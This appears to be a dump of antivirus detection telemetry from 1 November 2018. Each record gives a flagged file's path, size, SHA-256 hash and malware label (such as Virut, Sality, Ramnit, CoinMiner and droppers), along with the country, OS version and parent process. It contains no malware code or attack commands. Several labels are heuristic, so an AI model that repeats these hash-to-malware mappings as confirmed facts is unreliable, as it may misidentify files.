  Row(detection=Row(filename='avscan-20181101-105836-9d09cd84', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-105836-9D09CD84', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T16:58:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='com.skype.raider.exe', filepath='G:\\Android\\data\\com.skype.raider.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='e9238eb4cc2a0e45a4ecca77c7477cc3a19b6954cc0ca545537f1325ece125fc', metadata=Row(cmdline=None, country='CI', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\explorer.exe', parentsize=2106176, timestamp='2018-11-01T11:53:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='subsearelic_setup.exe', filepath='d:\\games\\subsearelic_setup\\subsearelic_setup.exe', filesize=11660000, name='HEUR/Patched.Ren.#M1.#R1'), hash='dcc285e0cb17d3ae237eeb908812261bc6f01bbf2e9518ebd23d57343c365f17', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:09:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ultimatedefrag.exe', filepath='K:\\HBCD\\Programs\\ULTIMATEDEFRAG.EXE', filesize=64000, name='TR/Siggen.jziio.#M1.#R1'), hash='90568927525dfcaaa660df9052a3ca5011f215b8d8955afe267f85fc3ff979e8', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='K:\\HBCD\\PStart.exe', parentsize=786952, timestamp='2018-11-01T17:01:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e16de72f3d1a12919570e803aa627331a2837a6741ed99f8e76d8128d64becef', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-16\\E16DE72F3D1A12919570E803AA627331A2837A6741ED99F8E76D8128D64BECEF', filesize=1856000, name='HEUR/AGEN.1029502.#M1.#R1'), hash='e16de72f3d1a12919570e803aa627331a2837a6741ed99f8e76d8128d64becef', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-16.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-17.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-18.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-19.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-20.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\archive.zip\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T05:51:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-091048-7b578da9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2c0bde03\\AVSCAN-20181101-090119-0AF3D2E8\\AVSCAN-20181101-091048-7B578DA9', filesize=14208000, name='TR/CoinMiner.593149.#M1.#R1'), hash='5931493c4c1b03b23fbf74fceab77280aac7a0a483e0fb86c9db29216ba97f1e', metadata=Row(cmdline=None, country='AE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:10:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='eetsqpnmt0.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\eeTsQpNmt0.exe', filesize=71984000, name='WORM/Lodbak.Gen.#M300.#R7829'), hash='94521c06bf99686d8902a798f7a102f120c49bd800b94d8b209a569ef7f4d690', metadata=Row(cmdline=None, country='MK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:13:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wmplayer.exe', filepath='\\\\?\\C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='afa73ab642d78f050ff87bfc3b01bf860c14fd2c937c63a4f1a4421d419f04dc', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:32:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='7f0c710258567a7e163382cacb4f2da179b03f463200aea7c6a5837ad786fd8a', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_11.10.2018-40.available\\Avira\\7F0C710258567A7E163382CACB4F2DA179B03F463200AEA7C6A5837AD786FD8A', filesize=192000, name='HEUR/AGEN.1005340.#M1.#R1'), hash='7f0c710258567a7e163382cacb4f2da179b03f463200aea7c6a5837ad786fd8a', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T10:55:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='documents.exe', filepath='C:\\Users\\X\\Documents\\Documents.exe', filesize=512000, name='TR/Taranis.2886.#M1.#R1'), hash='5d7619a3ea0a69ca84d26878d6cc2d60a93f9b95f23d937c064d5ba9043b9405', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='spanish.exe', filepath='F:\\New folder\\Corel Draw 12\\Spanish\\Spanish.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T17:18:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T09:28:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dxacb6a.tmp', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\dxaCB69.tmp\\dxaCB6A.tmp', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T11:03:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autorun.exe', filepath='d:\\autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T08:07:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wmplayer.exe', filepath='\\\\?\\C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='00c618a5649728023515e161bd8125bbd9bd45816c1024e6b69276c52dce8e70', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:30:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-003603-90b76ee7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-003603-90B76EE7', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:36:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T06:55:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Desktop\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Desktop\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T22:18:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bluetooth_mainline.dll', filepath='C:\\Program Files\\Intel\\PhoneTool\\Bluetooth_mainline.dll', filesize=320000, name='W32/Ramnit.CD.#M1.#R1'), hash='7cf109de54523446dd161d163e3d6177b65a6b8921d2fb147e6f22e17d7a8f59', metadata=Row(cmdline='--engine=2 --session-id=AoTBbY4VM\\\\\\/EBWK242hn9BIxBCqlSBQLadTNYyhHp --registry-suffix=ESET --enable-crash-reporting --srt-field-trial-group-name=NewCleanerUIExperiment', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\34.174.200\\software_reporter_tool.exe', parentsize=12184696, timestamp='2018-11-01T05:54:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-000042-be77c8c8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_18ea1c13\\AVSCAN-20181101-235916-B572C54B\\AVSCAN-20181102-000042-BE77C8C8', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T16:00:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup (1).zip\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='SI', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup (1).zip\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T22:47:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-194950-bafbc569', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a27c5c9\\AVSCAN-20181101-194803-A89BA1A8\\AVSCAN-20181101-194950-BAFBC569', filesize=64000, name='TR/Siggen.64000.12.#M1.#R1'), hash='01bb8e327211e5fff9594e791c0abb322f765b94a3d0400e7eec9dad68e3310e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:49:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-174713-359cfa3e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_57b063e7\\AVSCAN-20181101-174631-30AB3598\\AVSCAN-20181101-174713-359CFA3E', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:47:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Downloads\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T16:09:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ioc2e7050d3-614a-2747-b368-924946e111a4.exe', filepath='C:\\ProgramData\\Kaspersky Lab\\AVP18.0.0\\Temp\\ioc2E7050D3-614A-2747-B368-924946E111A4.exe', filesize=16416000, name='TR/Patched.Ren.Gen.#M300.#R4405'), hash='153672a8a39883d8fb5baf76454c9145ca648f8b6f3b8d32afe39dd96807095d', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-01T12:51:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Desktop\\Setup\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Desktop\\Setup\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T17:02:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Downloads\\Setup\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline='a70a003acda2a13c1bad50d2ba0139ac', country='GY', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\Setup\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T20:48:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T02:02:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T13:52:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-092543-b29db3ff', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9aa61a38\\AVSCAN-20181102-091734-6AAEB4B9\\AVSCAN-20181102-092543-B29DB3FF', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:50:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered fodar', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fodar', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='35d68f729ac3beb6920e8a8f9bd7a7ee7fb5ef5ac1761d2d1f86d580d9c4e9e0', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:11:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='system volume information.exe', filepath='\\?\\D:\\System Volume Information.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='388a734e1ec41559c2578c82242cd984b2559f81e04811552762fa1d5a4a18ed', metadata=Row(cmdline=None, country='BF', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:35:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ehshell.exe', filepath='C:\\Windows\\ehome\\ehshell.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='5d9fb282a688991ed4b31b984d69272a53d26e9c349a06892e810aab3e300756', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T21:32:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='nwsraevs.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\NWsRAeVS.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:01:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150946-fca76fa3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-150946-FCA76FA3', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:09:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service_18bdd202.vir', filepath='\\\\?\\C:\\Applications\\Service_18bdd202.VIR', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:21:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service.exe', filepath='C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='PT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3904296, timestamp='2018-11-01T13:47:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='เพลงครู.exe', filepath='E:\\music\\เพลงครู\\เพลงครู.exe', filesize=1088000, name='W32/Virut.Gen.#M1.#R1'), hash='ee942418d6ceacd7df7aae460e7cc400e3fe5195d4c4fb6de36c1b1b0fdca621', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T09:14:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150602-d1bb43bf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-150602-D1BB43BF', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:06:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='qmpcipgt.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\qMPcIPgt.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:01:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\0uuggiwjyc3\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='MY', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=18630056, timestamp='2018-11-01T08:31:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='addetto di cucina.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\CORSI FORMAZIONE ADULTI\\ALIMENTARI\\ADDETTO DI CUCINA.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:11:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094651-1a3ea8a8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-094651-1A3EA8A8', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:46:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='udvderase.exe', filepath='C:\\Program Files\\Corel\\Corel Burn.Now Lenovo Edition\\uDVDErase.exe', filesize=512000, name='W32/Infector.Gen.#M300.#R7863'), hash='986d6c6f11f0f835f658d63eccc74011e72327722f30f643be50add31ec82743', metadata=Row(cmdline='invagent.dll,RunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T01:08:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\ojaqyzt05c4\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1539186467.5bbe1f2321df8', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\MR\\1845663.exe', parentsize=664576, timestamp='2018-11-01T11:28:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152155-88785027', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-152155-88785027', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:22:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-165817-7e6b2ca5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d44abda7\\AVSCAN-20181101-165623-7572B90A\\AVSCAN-20181101-165817-7E6B2CA5', filesize=64000, name='HEUR/Macro.Downloader.FAB.Gen.#M1.#R1'), hash='9766a96e18bebe93b58cfb3154a35ae732c466884e0d7343b6d888b596e47132', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T23:58:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sanitario.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\STAGE 2016-2017\\PFI OSS 582579\\sanitario.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:18:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\lbxriq04r2m\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T04:03:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='aapt.exe', filepath='K:\\TAB\\Lenovo_A5500HV\\Lenovo_A5500HV_A442_001_019_130808_ROW_(by_xdafirmware.com)\\Lenovo_A5500HV_A442_001_019_130808_ROW\\SN Write Tool v2.1444.00\\Android\\aapt.exe', filesize=2048000, name='W32/Sality.AT.#M1.#R1'), hash='e771100dd7a39bd9d1cf7baa0dc0fe9400dbf1e0e1c925b4a18f9e712ac0d361', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\dwm.exe', parentsize=92672, timestamp='2018-11-01T12:40:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-093822-b8c263fa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-093822-B8C263FA', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:38:29Z'), dt=datetime.date(2018, 11, 1)),
